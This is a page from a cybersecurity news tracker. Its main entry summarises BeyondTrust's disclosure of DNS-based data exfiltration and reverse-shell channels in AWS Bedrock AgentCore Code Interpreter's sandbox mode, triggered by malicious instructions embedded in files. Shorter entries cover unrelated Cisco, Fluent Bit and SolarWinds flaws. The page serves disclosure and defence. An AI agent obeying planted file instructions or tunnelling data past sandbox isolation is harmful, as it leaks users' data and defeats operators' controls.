CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

DNS Exfiltration in AWS Bedrock Code Interpreter

First reported
Last updated
2 unique sources, 2 articles

Summary

Hide ▲

Security researchers and BeyondTrust demonstrated a DNS-based data exfiltration method in AWS Bedrock AgentCore Code Interpreter's sandbox mode, allowing attackers to establish bidirectional command-and-control channels, obtain interactive reverse shells, and exfiltrate sensitive data via DNS queries despite network isolation restrictions. The technique leverages malicious instructions embedded in files and requires overly permissive IAM roles to access AWS resources such as S3 buckets. AWS confirmed the behavior as intended functionality and updated documentation, recommending migration from sandbox mode to VPC mode for sensitive workloads. BeyondTrust assigned a CVSS score of 7.5 to the issue. The findings highlight architectural challenges in sandbox isolation and underscore the risks of overprivileged IAM roles in AI code execution environments.

Timeline

  1. 16.03.2026 15:00 2 articles · 2d ago

    DNS Exfiltration Technique Demonstrated in AWS Bedrock Code Interpreter

    BeyondTrust disclosed a DNS-based data exfiltration method in AWS Bedrock AgentCore Code Interpreter's sandbox mode with a CVSS score of 7.5. The technique allows attackers to establish bidirectional communication channels via DNS queries and responses, obtain interactive reverse shells, and exfiltrate sensitive information through DNS queries if the associated IAM role has permissions to access AWS resources like S3 buckets. AWS confirmed the behavior as intended functionality and updated documentation, recommending migration to VPC mode for sensitive workloads.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Cisco SD-WAN Zero-Day Exploited by Highly Sophisticated Threat Actor

A critical zero-day vulnerability (CVE-2026-20127) in Cisco Catalyst SD-WAN Controller and Manager is being actively exploited by a sophisticated threat actor, tracked as UAT-8616. The flaw allows unauthenticated remote attackers to bypass authentication and gain administrative privileges. The exploitation dates back to 2023, and Cisco has credited the Australian Signals Directorate's Australian Cyber Security Centre (ASD-ACSC) for reporting the vulnerability. The vulnerability has a CVSS score of 10.0, indicating maximum severity. Cisco is actively tracking the exploitation and post-compromise activities associated with this flaw. The threat actor is described as highly sophisticated, and the exploitation has been ongoing for some time.

Open in new tab

Critical Vulnerabilities in Fluent Bit Logging Agent

Critical vulnerabilities in Fluent Bit, a widely used telemetry agent, have been disclosed. These flaws affect log, metric, and trace handling across banking, cloud, and SaaS platforms. The issues include improper input validation, path traversal bugs, and authentication bypasses, allowing attackers to manipulate logs, overwrite files, and execute code. Patches are available in versions v4.1.1 and v4.0.12, but older versions remain at risk. The vulnerabilities could distort observability pipelines, impacting financial services, security products, and SaaS environments. Immediate patching and configuration hardening are recommended. AWS has urged customers to update to the latest version of Fluent Bit for optimal protection. The flaws could enable attackers to disrupt cloud services, manipulate data, and burrow deeper into cloud and Kubernetes infrastructure.

Open in new tab

Multiple Critical Vulnerabilities in SolarWinds Web Help Desk

SolarWinds has released security updates to address multiple critical vulnerabilities in SolarWinds Web Help Desk, including CVE-2025-40536, CVE-2025-40537, CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, and CVE-2025-40554. These vulnerabilities could result in authentication bypass and remote code execution (RCE). CVE-2025-40551 is actively exploited in attacks and has been added to CISA's KEV catalog. SolarWinds Web Help Desk is used by more than 300,000 customers worldwide, including government agencies, large corporations, healthcare organizations, and educational institutions. SolarWinds has also released security updates to patch four critical Serv-U remote code execution vulnerabilities that could grant attackers root access to unpatched servers. The most severe flaw, CVE-2025-40538, allows attackers with high privileges to gain root or admin permissions on vulnerable servers. These vulnerabilities include a broken access control flaw, two type confusion flaws, and an Insecure Direct Object Reference (IDOR) vulnerability. All four vulnerabilities require attackers to already have high privileges on the targeted servers.

Open in new tab

Critical RADIUS Authentication Flaw in Cisco Secure Firewall Management Center

Cisco has disclosed and patched a critical vulnerability in the RADIUS subsystem of Secure Firewall Management Center (FMC) Software. The flaw, CVE-2025-20265, allows unauthenticated, remote attackers to execute arbitrary shell commands on affected systems. This vulnerability affects FMC Software versions 7.0.7 and 7.7.0 when RADIUS authentication is enabled for web-based management or SSH. Additionally, Cisco has released security updates to patch two maximum-severity vulnerabilities in its Secure Firewall Management Center (FMC) software: an authentication bypass flaw (CVE-2026-20079) that allows attackers to gain root access to the underlying operating system, and a remote code execution (RCE) vulnerability (CVE-2026-20131) that lets attackers execute arbitrary Java code as root on unpatched devices. Cisco's Product Security Incident Response Team (PSIRT) has no evidence that these flaws are exploited in attacks or that proof-of-concept (PoC) exploit code has been published online. In March 2026, Cisco released a bundled publication containing 25 security advisories detailing vulnerabilities in enterprise networking products, including nine high-severity vulnerabilities in the ASA Firewall, Secure FMC, and Secure FTD appliances. Cisco is not aware of any of these vulnerabilities being exploited in the wild.

Open in new tab